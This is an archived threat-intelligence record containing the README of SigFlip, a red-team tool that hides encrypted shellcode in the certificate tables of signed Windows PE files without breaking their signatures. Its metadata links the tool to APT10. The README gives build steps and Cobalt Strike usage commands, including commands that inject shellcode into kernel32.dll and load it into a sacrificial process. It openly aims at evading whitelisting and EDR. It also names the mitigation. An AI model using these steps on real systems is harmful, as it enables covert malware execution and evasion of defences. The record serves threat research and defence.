{ "id": "8a6c212b-1eb4-4d11-b1b6-0634e5dd1bd0", "created_at": "2026-04-06T00:09:42.006209Z", "updated_at": "2026-04-10T03:32:39.291632Z", "deleted_at": null, "sha1_hash": "a09723900d2b4ce8e9c0e5e99d14c15719c91a44", "title": "GitHub - med0x2e/SigFlip: SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) without invalidating or breaking the existing signature.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 85437, "plain_text": "GitHub - med0x2e/SigFlip: SigFlip is a tool for patching\r\nauthenticode signed PE files (exe, dll, sys ..etc) without invalidating\r\nor breaking the existing signature.\r\nBy med0x2e\r\nArchived: 2026-04-05 20:21:07 UTC\r\nWhat is it ?\r\nSigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) in a way that doesn't affect or break\r\nthe existing authenticode signature, in other words you can change PE file checksum/hash by embedding data (i.e\r\nshellcode) without breaking the file signature, integrity checks or PE file functionality.\r\nSigInject encrypts and injects shellcode into a PE file's [WIN_CERTIFICATE] certificate table, the encryption key\r\nis printed out for usage with a basic BOF/C/C# loader (SigLoader), SigInject saves changes to a modified PE file\r\nand keeps its signature and certificate validity intact.\r\nSigLoader is a basic loader which takes a modified PE file path created by SigInject and the decryption key as\r\nparameters, then extract and decrypt embedded shellcode for usage with a shellcode injection of choice.\r\nSigFlip will check if PE hash was successfully changed and also check and exit gracefully in case endpoints are\r\nhardened against such common misconfiguration. (check \"Details\" section).\r\nQuick Note: SigFlip, SigInject and SigLoader are available as BOF scripts and .NET assemblies, the only\r\ndifference is that SigInject functionality is implemented as part of SigFlip (-i) in case if you choose to use .NET\r\nartifacts instead of BOFs.\r\nWhy ?\r\nIt can be used mainly for persistence, lateral movement or code/command execution and can help with:\r\nApplication whitelisting bypasses, changing the PE file hash (msbuild.exe for ex) without breaking the\r\nsignature.\r\nBypassing EDRs relying on specific LOLBINs' hashes for malicious code/command execution detection.\r\nLoad signed drivers using a different hash, might help circumvent any EDRs watching for common\r\nvulnerable signed drivers using a pre-defined list of hashes.\r\nEmbed encrypted shellcode in a signed PE file and use a stager (sigloader) of your preference to parse,\r\ndecrypt, load and execute it.\r\nEndpoint security vendors tend to classify signed PE files as benign most of the time, embedding your\r\nunsigned code (shellcode ..etc.) in a signed PE file makes it a little bit hard to detect/flag.\r\nBypassing endpoint security vendors relying mainly on the default WinVerifyTrust for signature validation.\r\nhttps://github.com/med0x2e/SigFlip\r\nPage 1 of 6\n\nImproving OPSEC and challenging defenders relying solely on typical signature verification utilities such\r\nas signtool, sigcheck, Get-AuthenticodeSignature ..etc to validate the authenticoode signature of PE files.\r\nUsage \u0026 Examples:\r\nCompile/Build:\r\nPrecompiled BOF's are not provided in this project, can be compiled using Mingw-w64, for .NET use VS or\r\ncsc.exe to compile .NET projects (SigFlip, SigLoader), for BOF check steps below;\r\n➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o\r\n➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o\r\n➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o\r\n➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o\r\nMake sure all object files are located in the same directory as sigflip.cna, then load sigflip.cna script to cobalt\r\nstrike.\r\nQuick Note: pre-compiled BOFs were tested and compatible with mingw-64 v8.0.0_3, using mingw-64 \u003e= v9\r\nmight work but might crash active beacons, check #2 for more details.\r\nCobalt Strike:\r\n1. Execute-Assembly\r\nexecute-assembly SigFlip.exe -h\r\nexecute-assembly SigLoader -h\r\n2. BOF\r\nFor usage with cobalt strike, once you load the SigFlip.cna script, two new commands will be\r\nregistered; SigFlip and SigInject, then use as below;\r\nSigFlip: Change a PE file (DLL, EXE, SYS, OCX ..etc) hash without breaking the signature\r\nor the validity of the certificate:\r\nSigFlip \"\u003cPE\\_FILE\\_PATH\u003e\" \"\u003cOUTPUT\\_PE\\_FILE\\_PATH (with extension)\u003e\"\r\nSigInject: Encrypts and Injects shellcode into a PE file's [WIN_CERTIFICATE] certificate\r\ntable, encryption key is printed out for usage with a basic C/C# loader plus keeps the\r\nsignature and certificate validity intact:\r\nSigInject \"\u003cPE\\_FILE\\_PATH\u003e \u003cOUTPUT\\_PE\\_FILE\\_PATH (with extension)\u003e\" \"\r\n\u003cSHELLCODE\\_FILE\u003e\"\r\nSigLoader: Loads encrypted shellcode from PE files created by SigInject, then use Early\r\nBird queueuserapc to spawn/inject sc into a sacrificial process, shellcode injection logic can\r\nhttps://github.com/med0x2e/SigFlip\r\nPage 2 of 6\n\nbe customized or replaced with any other code injection technique of choice:\r\nSigLoader \u003cPE_FILE_PATH_WITH_SH\u003e \u003cDECRYPTION_KEY\u003e \u003cSPAWNTO_PROCESS_PATH\u003e\r\n\u003cPARENT_PROCESS_ID\u003e\r\n3. Examples\r\nBOF:\r\nInject random data to msbuild.exe (aka bit flip msbuild.exe):\r\nSigFlip \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe\"\r\n\"C:\\lolbins\\modified-msbuild.exe\"\r\nInject shellcode to kernel32.dll (Arguments order is different \u0026 make sure to take note of the\r\ndecryption key):\r\nSigInject \"C:\\Windows\\System32\\kernel32.dll\" \"C:\\random\\modified-kernel32.dll\" \"C:\\shellcode\\cobaltstrike_or_msf_shellcode.bin\"\r\nSigloader \"C:\\random\\modified-kernel32.dll\" \"DECRYPTION_KEY\"\r\n\"C:\\Windows\\System32\\werfault.exe\" 6300\r\nExecute-Assembly:\r\nInject random data to msbuild.exe:\r\nexecute-assembly SigFlip.exe -b\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -o\r\nC:\\Temp\\MSBuild.exe\r\nInject shellcode to kernel32.dll (Arguments order is different \u0026 make sure to take note of the\r\ndecryption key):\r\nexecute-assembly SigFlip.exe -i C:\\Windows\\System32\\kernel32.dll -s\r\nC:\\Temp\\x86shellcode.bin -o C:\\Temp\\kernel32.dll -e TestSecretKey\r\nexecute-assembly SigLoader.exe -f C:\\Temp\\modified-kernel32.dll -e\r\nTestSecretKey -pid 2354\r\nDetails:\r\nThis is a known technique used by APT#10 in multiple campaigns or intrusion sets.\r\nAuthenticode Digital Signatures ?\r\nAuthenticode is a Microsoft code-signing technology that identifies the publisher of Authenticode-signed\r\nsoftware. Authenticode also verifies that the software has not been tampered with since it was signed and\r\npublished.\r\nHow does it work ?\r\nhttps://github.com/med0x2e/SigFlip\r\nPage 3 of 6\n\nMicrosoft relies mainly on Authenticode signing format for verifying the integrity and the origin of PE binaries,\r\naccording to the Authenticode Portable Executable format specification the Authenticode signatures can be\r\n“embedded” in a Windows PE file, in a location specified by the Certificate Table entry in Optional Header Data\r\nDirectories. When Authenticode is used to sign a Windows PE file, the algorithm that calculates the file’s\r\nAuthenticode hash value excludes certain PE fields. When embedding the signature in the file, the signing\r\nprocess can modify these fields without affecting the file’s hash value. These fields are as follows: **the\r\nchecksum, certificate table RVA, certificate table size and the attribute certificate table. The attribute certificate\r\ntable contains a PKCS #7 SignedData structure containing the PE file’s hash value, a signature created by the\r\nsoftware publisher’s private key, and the X.509 v3 certificates that bind the software publisher’s signing key to a\r\nlegal entity.\r\nIn layman's terms, we can modify or embed data into fields execulded from the authenticode hash calculation\r\nwithout worrying about breaking the authenticode signature and file integrity checks.\r\nMore details about such excluded fields:\r\nCertificate table RVA and Size: A signed PE file optional header structure contains an array of data\r\ndirectories including the security directory IMAGE_DIRECTORY_ENTRY_SECURITY entry which\r\nhas two fields, RVA and Size.\r\nRVA: a file offset (not a memory offset) to the attribute certificate table.\r\nSize: attribute certificate table size.\r\nAttribute Certificate Table: a data structure WIN_CERTIFICATE which encapsulate the signature and\r\ncertificates and has the following fields:\r\ndwLength : certificate table size.\r\nwRevision : the “revision” of the WIN_CERTIFICATE .\r\nwCertificateType : the kind of encapsulated certificate data.\r\nbCertificate : the actual certificate data. For WIN_CERT_TYPE_PKCS_SIGNED_DATA , this is the\r\nPKCS#7 SignedData structure mentionned above (which contains the PE hash value, signature\r\nand x.509 certificate), this is exactly where SigFlip embed randm random data or shellcode.\r\nWith all of that in mind, now SifFlip does the following:\r\n1. Check system configuration\r\n2. Loading PE File \u0026 Verifying PE file signature \u0026 Compute Sha1 hash\r\n3. Get \"e_lfanew\" offset (pointing to the PE FILE HEADER -\u003e IMAGE_NT_HEADERS)\r\n4. Get IMAGE_OPTIONAL_HEADER from IMAGE_NT_HEADERS\r\n5. Get IMAGE_DATA_DIRECTORY from IMAGE_OPTIONAL_HEADER\r\n6. Get IMAGE_DIRECTORY_ENTRY_SECURITY field and retrieve the RVA and SIZE of the Attribute\r\nCertificate Table (WIN_CERTIFICATE).\r\n7. Patch the PE File blob by padding the Certificate Table with extra bytes (random/shellcode) of choice.\r\n8. Update the optional header -\u003e IMAGE_DIRECTORY_ENTRY_SECURITY data directory Size\r\n9. Update WIN_CERTIFICATE (Certificate Table) dwLength\r\nhttps://github.com/med0x2e/SigFlip\r\nPage 4 of 6\n\n10. Generate the new PE cheksum and update it. (OPT Header Checksum)\r\n11. Save the final PE with new size.\r\n12. Verify modified PE file signature\r\nThe first step is essential to confirm if the system is misconfigured in a way to allow padding and injecting\r\nshellcode into authenticode signed PE files, therefore the following sanity checks are performed:\r\n1. Check if MS13-098 fix is not installed (KB2893294), Keep in mind IT COULD BE INSTALLED BUT\r\nREGISTRY KEYS ARE NOT PROPERLY SET, WHICH RENDERS THE PATCH USELESS\r\n2. Check Registry keys\r\n1. X86:\r\nCheck if registry key \"HKLM:\\Software\\Microsoft\\Cryptography\\Wintrust\\Config\" is not\r\navailable\r\n-\u003e if available then check if \"EnableCertPaddingCheck\" registry value is not available\r\n2. X64:\r\nCheck if registry key\r\n\"HKLM:\\Software\\Wow6432Node\\Microsoft\\Cryptography\\Wintrust\\Config\" is not\r\navailable\r\n-\u003e if available then check if \"EnableCertPaddingCheck\" registry value is not\r\navailable.\r\nWhy cannot read the injected data when the modified PE is loaded as a module into its own address space\r\nor the address space of other processes ?\r\nWindows loader doesn't load certificate data into the process address space, reason why you need a custom loader\r\nto extract data such as shellcode and use it (ex: SigLoader). this should also explain why\r\nIMAGE_DIRECTORY_ENTRY_SECURITY data directory entry RVA is a file offset instead of a typical\r\nmemory offset.\r\nDetect/Prevent:\r\nhttps://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2014/2915720?\r\nredirectedfrom=MSDN\r\nOnce the patch is installed and proper registry keys are set, No system restarts are required, you only need\r\nto restart the Cryptographic Services. The Applocker service will be also restarted as it depends on the\r\ncryptographic services.(@p0w3rsh3ll)\r\nYara rule by Adrien; https://twitter.com/Int2e_/status/1330975808941330432\r\nReferences\r\nhttps://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-098?\r\nredirectedfrom=MSDN\r\nhttps://github.com/med0x2e/SigFlip\r\nPage 5 of 6\n\nhttps://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2014/2915720?\r\nredirectedfrom=MSDN\r\nhttp://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/authenticode_pe.docx\r\nhttps://msrc-blog.microsoft.com/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode/\r\nhttps://www.specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\r\nhttps://p0w3rsh3ll.wordpress.com/2014/05/24/testing-ms13-098-certificate-padding-check/\r\nhttp://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf\r\nSource: https://github.com/med0x2e/SigFlip\r\nhttps://github.com/med0x2e/SigFlip\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://github.com/med0x2e/SigFlip" ], "report_names": [ "SigFlip" ], "threat_actors": [ { "id": "04b07437-41bb-4126-bcbb-def16f19d7c6", "created_at": "2022-10-25T16:07:24.232628Z", "updated_at": "2026-04-10T02:00:04.906097Z", "deleted_at": null, "main_name": "Stone Panda", "aliases": [ "APT 10", "ATK 41", "Bronze Riverside", "CTG-5938", "CVNX", "Cuckoo Spear", "Earth Kasha", "G0045", "G0093", "Granite Taurus", "Happyyongzi", "Hogfish", "ITG01", "Operation A41APT", "Operation Cache Panda", "Operation ChessMaster", "Operation Cloud Hopper", "Operation Cuckoo Spear", "Operation New Battle", "Operation Soft Cell", "Operation TradeSecret", "Potassium", "Purple Typhoon", "Red Apollo", "Stone Panda", "TA429", "menuPass", "menuPass Team" ], "source_name": "ETDA:Stone Panda", "tools": [ "Agent.dhwf", "Agentemis", "Anel", "AngryRebel", "BKDR_EVILOGE", "BKDR_HGDER", "BKDR_NVICM", "BUGJUICE", "CHINACHOPPER", "ChChes", "China Chopper", "Chymine", "CinaRAT", "Cobalt Strike", "CobaltStrike", "DARKTOWN", "DESLoader", "DILLJUICE", "DILLWEED", "Darkmoon", "DelfsCake", "Derusbi", "Destroy RAT", "DestroyRAT", "Ecipekac", "Emdivi", "EvilGrab", "EvilGrab RAT", "FYAnti", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "GreetCake", "HAYMAKER", "HEAVYHAND", "HEAVYPOT", "HTran", "HUC Packet Transmit Tool", "Ham Backdoor", "HiddenFace", "Impacket", "Invoke the Hash", "KABOB", "Kaba", "Korplug", "LODEINFO", "LOLBAS", "LOLBins", "Living off the Land", "MiS-Type", "Mimikatz", "Moudour", "Mydoor", "NBTscan", "NOOPDOOR", "Newsripper", "P8RAT", "PCRat", "PlugX", "Poison Ivy", "Poldat", "PowerSploit", "PowerView", "PsExec", "PsList", "Quarks PwDump", "Quasar RAT", "QuasarRAT", "RedDelta", "RedLeaves", "Rubeus", "SNUGRIDE", "SPIVY", "SharpSploit", "SigLoader", "SinoChopper", "SodaMaster", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trochilus RAT", "UpperCut", "Vidgrab", "WinRAR", "WmiExec", "Wmonder", "Xamtrav", "Yggdrasil", "Zlib", "certutil", "certutil.exe", "cobeacon", "dfls", "lena", "nbtscan", "pivy", "poisonivy", "pwdump" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434182, "ts_updated_at": 1775791959, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a09723900d2b4ce8e9c0e5e99d14c15719c91a44.pdf", "text": "https://archive.orkl.eu/a09723900d2b4ce8e9c0e5e99d14c15719c91a44.txt", "img": "https://archive.orkl.eu/a09723900d2b4ce8e9c0e5e99d14c15719c91a44.jpg" } }